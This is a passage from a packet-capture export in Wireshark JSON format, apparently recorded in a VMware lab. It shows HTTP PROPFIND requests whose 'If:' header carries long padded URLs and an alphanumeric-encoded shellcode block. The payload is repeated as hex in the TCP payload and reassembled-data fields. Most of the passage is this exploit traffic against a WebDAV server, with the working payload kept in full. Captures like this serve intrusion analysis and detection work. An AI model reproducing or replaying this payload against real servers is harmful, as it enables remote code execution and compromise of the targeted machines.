<http://192.168.68.1:80/mZLUofybDTeiAEOEHIkrVGJORMKpFRNoeHoZfFObZxYHwyyTwbaFHLsZAIAnLjgPVzaOHm<48><6D><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "538"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.888420000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.888420000",
|
||
"frame.time_delta": "0.000005000",
|
||
"frame.time_delta_displayed": "0.003431000",
|
||
"frame.time_relative": "17.139360000",
|
||
"frame.number": "546",
|
||
"frame.len": "267",
|
||
"frame.cap_len": "267",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "253",
|
||
"ip.id": "0x00002c64",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00000430",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "42745",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "42745",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "77",
|
||
"tcp.len": "201",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2091620892",
|
||
"tcp.nxtseq": "1650",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1664856424",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000b3cf",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:98:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:98:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868696",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000335000",
|
||
"tcp.analysis.bytes_in_flight": "1649",
|
||
"tcp.analysis.push_bytes_sent": "1649"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000569000",
|
||
"tcp.time_delta": "0.000005000"
|
||
},
|
||
"tcp.payload": "6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "545",
|
||
"tcp.segment": "546",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1649",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:65:71:55:6d:7a:63:49:4e:6b:7a:57:45:53:65:59:49:57:79:4c:4d:47:45:51:51:6a:6b:57:51:4b:63:6d:4b:4e:71:57:44:48:70:6e:76:71:75:61:47:7a:6c:58:73:65:76:51:77:61:50:70:48:4c:64:71:73:4d:68:76:56:68:69:61:48:66:e4:a1:b2:e4:b9:99:e4:b9:83:e6:89:95:e5:a9:a4:e5:99:89:e4:a5:ab:e4:ad:92:e4:85:ae:e6:b5:b8:e6:b1:8e:e4:a9:8b:e6:85:91:e6:89:9a:e7:95:ba:e5:85:b5:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:8d:98:e7:99:96:e4:91:af:e4:9d:b3:e4:bd:a5:e4:89:89:e7:a9:a1:e4:8d:97:e5:a5:8f:e6:b5:98:e6:ad:94:e6:85:85:e6:ad:85:e4:89:93:e4:a9:89:e7:a5:b0:e6:b5:b6:e4:a9:b6:e6:85:b2:e7:a9:8c:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:42:72:4c:47:75:76:61:61:63:4a:71:51:70:6a:42:72:65:4b:63:73:4b:74:64:76:75:4a:50:43:79:73:59:4c:6a:6d:44:57:47:69:72:72:75:65:53:6b:49:57:4a:6a:63:4d:56:68:4d:42:49:4a:48:4e:4f:45:7a:50:45:4e:74:64:78:6f:6f:e4:bd:a5:e6:9d:97:e7:91:8e:e7:a5:98:e6:a5:b0:e7:95:a9:e4:85:93:e6:91:9a:e6:a9:a3:e6:9d:9a:e6:ad:99:e5:a5:b4:e4:95:81:e6:bd:a6:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:a9:b1:e4:ad:9a:e6:a5:82:e5:a9:b9:e1:8f:80:e6:a0:83:e5:85:ad:e7:85:b9:e4:95:92:e4:95:ad:e6:a5:a9:e7:8d:ba:e7:a5:b0:e6:89:90:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/eqUmzcINkzWESeYIWyLMGEQQjkWQKcmKNqWDHpnvquaGzlXsevQwaPpHLdqsMhvVhiaHf<48><66><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/BrLGuvaacJqQpjBreKcsKtdvuJPCysYLjmDWGirrueSkIWJjcMVhMBIJHNOEzPENtdxoo<6F><6F><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "548"
|
||
}
|
||
}
|
||
}
|
